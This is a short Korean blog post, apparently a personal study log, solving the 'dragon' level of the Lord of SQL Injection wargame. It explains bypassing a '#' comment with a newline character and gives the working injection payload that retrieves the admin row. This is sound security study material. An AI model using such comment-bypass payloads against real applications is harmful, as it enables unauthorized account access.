보안 공부/Load of SQL injection

[Load of SQL Injection] dragon

sh1256 2022. 1. 30. 17:59
728x90

소스코드를 보면, id='guest'#를 통해 뒤에 부분을 주석처리한다. 

 

하지만 #는 한줄주석처리로 %0a를 만나게 하면 내릴 수 있다. 

 

id='%0aor id='admin' limit 1,1 #

where id='guest'# and pw=''%0a or id='admin' limit 1,1 #'

id가 guest와 admin 두개가 있기 때문에

두번째 인자인 admin에 대해서 출력할려면

limit 1,1 로 설정해 주어야 한다.

 

 

?id=id='%0aor id='admin' limit 1,1 %23 입력

성고옹

저작자표시 비영리 변경금지 (새창열림)

'보안 공부 > Load of SQL injection' 카테고리의 다른 글

[Load of SQL Injection] dark eyes  (0) 2022.02.05
[Load of SQL Injection] iron golem  (0) 2022.02.05
[Load of SQL Injection] xavis  (0) 2022.01.30
[Load of SQL Injection] nightmare  (0) 2022.01.30
[Load of SQL Injection] zombie assassin  (0) 2022.01.30

'보안 공부/Load of SQL injection'의 다른글

  • 현재글[Load of SQL Injection] dragon

관련글

댓글

티스토리툴바